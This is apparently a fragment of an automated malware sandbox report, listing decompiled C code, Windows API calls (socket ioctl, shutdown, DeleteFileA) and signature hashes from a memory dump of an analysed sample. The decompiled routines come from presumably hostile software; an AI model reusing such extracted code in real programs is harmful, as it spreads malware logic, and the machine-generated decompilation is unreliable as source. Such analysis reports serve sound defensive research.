                                    0x24037a5b
                                    0x24037a60
                                    0x24037a63
                                    0x24037a6f
                                    0x24037a7c
                                    0x24037a86
                                    0x24037a8e
                                    0x24037a95
                                    0x24037a98
                                    0x24037a9b
                                    0x24037aa8
                                    0x24037ab5

                                    APIs
                                    • GetTickCount.KERNEL32 ref: 24037A4F
                                    • DeleteFileA.KERNEL32(00000000,.bmp,?,00000000,00000000,?,00000000,00000000,00000000,24037AB6), ref: 24037A7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CountDeleteFileTick
                                    • String ID: .bmp
                                    • API String ID: 3334397753-2863430793
                                    • Opcode ID: 5d09838b5dbda2db6b969e4b842fdf0a801727d071de7219e69a17ac339c6e74
                                    • Instruction ID: 56ef9ec1f8a93c828d2b14400da44eff182bebcb0fa92d9dc652f763471fc924
                                    • Opcode Fuzzy Hash: 5d09838b5dbda2db6b969e4b842fdf0a801727d071de7219e69a17ac339c6e74
                                    • Instruction Fuzzy Hash: EA115170900508AFFF01DFA4DC91A9EBBB8FF58304F5084B9E418B7658DB74AF858A54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E24022BF4(void* __eax, void* __ecx, void* __edx) {
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				intOrPtr _t4;
                                    				intOrPtr _t10;
                                    				intOrPtr* _t23;
                                    
                                    				_push(__ecx);
                                    				_t22 = __ecx;
                                    				_t21 = __edx;
                                    				_t14 = __eax;
                                    				if(__ecx != 0xffffffff) {
                                    					_push(0);
                                    					_push(__ecx);
                                    					_push(__edx);
                                    					_t4 =  *((intOrPtr*)(__eax + 0x14));
                                    					_push(_t4);
                                    					L240225B0();
                                    					 *_t23 = _t4;
                                    					__eflags =  *_t23;
                                    					if(__eflags == 0) {
                                    						_t4 = E24022A38(__eax, __eax, 0x24022c94, __edx, __ecx, __eflags);
                                    					}
                                    					__eflags =  *_t23 - 0xffffffff;
                                    					if( *_t23 == 0xffffffff) {
                                    						L240225E8();
                                    						 *_t23 = _t4;
                                    						__eflags =  *_t23 - 0x2733;
                                    						if(__eflags != 0) {
                                    							E24022A38(_t14, _t14, 0x24022ca0, _t21, _t22, __eflags);
                                    						} else {
                                    							 *_t23 = 0;
                                    						}
                                    					}
                                    				} else {
                                    					_push(_t23);
                                    					_push(0x4004667f);
                                    					_t10 =  *((intOrPtr*)(__eax + 0x14));
                                    					_push(_t10);
                                    					L240225A0();
                                    					_t25 = _t10 + 1;
                                    					if(_t10 + 1 == 0) {
                                    						 *_t23 = 0xffffffff;
                                    						E24022A38(__eax, __eax, 0x24022c88, __edx, __ecx, _t25);
                                    					}
                                    				}
                                    				return  *_t23;
                                    			}
                                    0x24022bf7
                                    0x24022bf8
                                    0x24022bfa
                                    0x24022bfc
                                    0x24022c01
                                    0x24022c2a
                                    0x24022c2c
                                    0x24022c2d
                                    0x24022c2e
                                    0x24022c31
                                    0x24022c32
                                    0x24022c37
                                    0x24022c3a
                                    0x24022c3e
                                    0x24022c47
                                    0x24022c47
                                    0x24022c4c
                                    0x24022c50
                                    0x24022c52
                                    0x24022c57
                                    0x24022c5a
                                    0x24022c61
                                    0x24022c71
                                    0x24022c63
                                    0x24022c65
                                    0x24022c65
                                    0x24022c61
                                    0x24022c03
                                    0x24022c03
                                    0x24022c04
                                    0x24022c09
                                    0x24022c0c
                                    0x24022c0d
                                    0x24022c12
                                    0x24022c13
                                    0x24022c15
                                    0x24022c23
                                    0x24022c23
                                    0x24022c13
                                    0x24022c7d

                                    APIs
                                    • ioctlsocket.WS2_32(?,4004667F), ref: 24022C0D
                                      • Part of subcall function 24022A38: shutdown.WS2_32(?,00000002), ref: 24022A83
                                      • Part of subcall function 24022A38: closesocket.WS2_32(?), ref: 24022AB1
                                    • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,00000000,?,24022CBD,?,?,2403964C,00000000,2403A33B), ref: 24022C52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastclosesocketioctlsocketshutdown
                                    • String ID: 3'
                                    • API String ID: 3350378930-280543908
                                    • Opcode ID: f5dc1c39abd40040a28d975040232451fe452102047e3e871c7c58a91caabf28
                                    • Instruction ID: 7482472f57dfd568b38b7b43ba680b7aca5b129539512fee90b592815c00cef7
                                    • Opcode Fuzzy Hash: f5dc1c39abd40040a28d975040232451fe452102047e3e871c7c58a91caabf28
                                    • Instruction Fuzzy Hash: ED0175742189109BD310FEF89C8495BA6D8AB5D374F714A7CA1D09F2D5D634C8C18752
                                    Uniqueness

                                    Uniqueness Score: -1.00%